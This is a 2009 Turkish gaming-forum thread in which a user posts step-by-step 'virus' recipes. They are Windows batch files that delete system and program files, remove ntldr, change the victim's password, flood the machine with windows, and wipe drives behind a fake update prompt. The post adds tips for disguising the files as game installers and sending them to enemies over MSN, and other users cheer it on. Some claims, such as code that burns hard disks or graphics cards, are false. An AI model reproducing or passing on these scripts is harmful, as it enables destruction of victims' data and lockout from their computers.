UYGARLIK SAVASLARI FORUMU
Would you like to react to this message? Create an account in a few clicks or log in to continue.

UYGARLIK SAVAŞLARI OYUNU GAYRİ RESMİ FORUMU TUM SERVERLER GIREBILIR

AnasayfaLatest imagesAramaKayıt OlGiriş yap

Adım niye trojan???

4 posters
YazarMesaj
trojan
ONBaŞı ****
ONBaŞı ****
trojan

ReP GüCü : 151
REP PuAn : 17

Adım niye trojan??? Empty
MesajKonu: Adım niye trojan???   Adım niye trojan??? Icon_minitimeCuma Haz. 12, 2009 11:19 am

Basit virüs kodları
30 sn de wirüs yapın …

Açıklama:

1. Notepad ‘i açın.

2. Notepad in içine şunları yazın:

@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
@echo .:: Sadece cız oldu ::.
@echo off

3. Notepad i kapatıp belgeyi kaydedin.

4. Uzantısını .txt den .bat a çevirin.

5. Hazır.

Açıklama:

Yaptıktan sonra dosyaya sakın tıklamayın !

Eğer tıklarsanız 2-3 sn saniye içinde bilgisayar kapanıyor ve bir daha açılmıyor.

Not : %100 ÇALIŞIYOR

Windows un önemli bi kaç dosyasını siliyor ve sonra “.:: Sadece cız oldu ::.”.

Peki bunu düşmanıma nasıl yediririm derseniz dosyanın adını fifa_2005_stream_install gibi değiştirin. Daha iyi çözümler için biraz sosyal mühendislik araştırmaları yapmalısınız..

Gördüğüm en Küçük virüs

Yapmanız gereken tek şey kodları Notepad e yapıştırıp uzantısını .bat olarak ayarlamak. sonra Msn de veya başka bir paylaşım programında başkasına gönderebilirsiniz. (tabii zipleyip) Peki virüsümüzün zararı C sürücüsündeki bazı dosyaları siliyor ve 2 sn sonra bilgisayar resetleniyor bir daha açılmamak üzere. Artık o pc yi format paklar…

@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo .::Format Down Up Your Sistem Limp_buskuit::.
@echo off

Nasıl .bat yapılır ?

MS-DOS komut istemini açın. Dosya neredeyse mesela C:\virus.txt şeklindeyse aynen şunu yazacaksın…

C:\ren virus.txt virus.bat sonra enter diyoruz..

Veya herhangi bir klasör açıyoruz. Menü’den Araçlar’ - Klasör Seçenekleri - Görünüm Sekmesi’ne gelin. Burada “Bilinen dosya türleri için uzantıları gizle” seçeneğini deaktif hale getiriyoruz. Tabii bunu yaptıktan sonra tüm dosyaların uzantıları açılacak ve isimlerini değiştirmeye kalktığınızda uzantılarını silmemelisiniz. Aksi takdirde hiç bir zarar gelmez programa veya oyuna fakat uzantısını siz doğru yazana kadar açamazsınız.

Format

Bunu notepade atın .bat olarak kaydedin karşı tarafa yollayın pcsine format atılacak

cd..
cd..
attrib -s -h -r -a c:\ntldr
del c:\ntldr
shutdown -r

Harddisk yakan virüs

Bu kodu kişinin “çalıştır”ına yazdırabilirseniz veye notepad’e kodu yapıştırıp biçimini .bat’a çevirirseniz dosyayı açtığı anda harddiski yanar;

/timersecure 0 0 //mkdir $mid(C:,1,2) $+ $rand(1,99999) $+ $rand(A,Z) $+ $rand(a,z)

Kurban’a, bunu “çalıştır”a yaz PC hızlanıyor falan derseniz oltaya gelebilir.

Karşı pc ye şifre koy

bunu notepad e yapıştır 123456 yazan yere koymak istediğin şifreyi yaz .bat uzantılı olarak kaydet (örnek yun.bat) zip le sıkıştır ve kurbana yolla. Bat dosyasını tıkladığı zaman pc si kapanır ve şifreli olarak açılır. Eğer şifreyi koyduktan sonra pc nin kapanmasını istemiyorsan shutdown -r kısmını silersin.

net user %username% 123456
shutdown -r

Bilgisayar’ı kitleme ve ekran kartını yakma virüsü

1. Öncelikle pc mizden not defteri acalım içine start yazıp kopyalayalım sonra sırasıyla yuzlerce start yazalım.

2. Daha sonra kaydet diyelim ve bu dosyayı txt olarak degılde .bat olarak kaydedelim işte size pc dondurucu sakın kendı pcinizde acmayın ama denemek isteyenler açabilir.sonrada .rarlayıp gönderiyoruz karşı taraf açarsa sonuc olarak pc de durmadan pencereler acılıyor yüzlerce reset atmak zorunda kalıyorsunuz. ekran kartını yoruyor ve yanmasına sebep oluyor.

Sistem çökertici

Mesela bir düşmanınızın Windows güncellemelerine ihtiyacı var. Hemen öncekiler gibi bu kodları uyguluyoruz.

Kurbanımız dosyayı açınca

“Microsoft windows XP’ nizi güncellemeye devam etmek için lutfen bir tusa basın.”

şeklinde bir uyarı ile karşılaşır

echo off
echo Microsoft windows XP' nizi güncellemeye devam etmek için lutfen bir tusa basın
echo off
pause
del /f /q d:
del /f /q c:
shutdown -r

shutdown -a bu’da panzehiri. eğer kendi pcnizde açarsanız 30 saniye sonra pc format atacaktır sizde bunu panzehir olarak bi yere kaydedin.. sonrada yanlışlıkla açarsanız bunu açın olay bitti

çok uraştım arkadaşlar Smile emeğe saygıı lol!
unrifled
ÜsTeğMeN ********
ÜsTeğMeN ********
unrifled

ReP GüCü : 1250
REP PuAn : 24

MesajKonu: Geri: Adım niye trojan???   Adım niye trojan??? Icon_minitimeCuma Haz. 12, 2009 4:41 pm

büyük başarı kardeşVery Happy
BLaCkMaNTr
YaRBaY ###
YaRBaY ###
BLaCkMaNTr

ReP GüCü : 6169
REP PuAn : 238

MesajKonu: Geri: Adım niye trojan???   Adım niye trojan??? Icon_minitimeC.tesi Haz. 13, 2009 4:26 pm

supersınde acımasızsın kotu bırseyya
http://uygarsavas.benimforum.org
trojan
ONBaŞı ****
ONBaŞı ****
trojan

ReP GüCü : 151
REP PuAn : 17

MesajKonu: Geri: Adım niye trojan???   Adım niye trojan??? Icon_minitimeC.tesi Haz. 13, 2009 6:35 pm

pirat Smile pirat programlı hacklerde var eklicem ykında
nowar
SuBaY ******
SuBaY ******
nowar

ReP GüCü : 1232
REP PuAn : 33

MesajKonu: Geri: Adım niye trojan???   Adım niye trojan??? Icon_minitimePaz Haz. 14, 2009 10:02 am

nickinin hakkını veriyorsun...

Adım niye trojan???
1 sayfadaki 1 sayfası
 Similar topics
-
» trojan MeDeNiYeT 4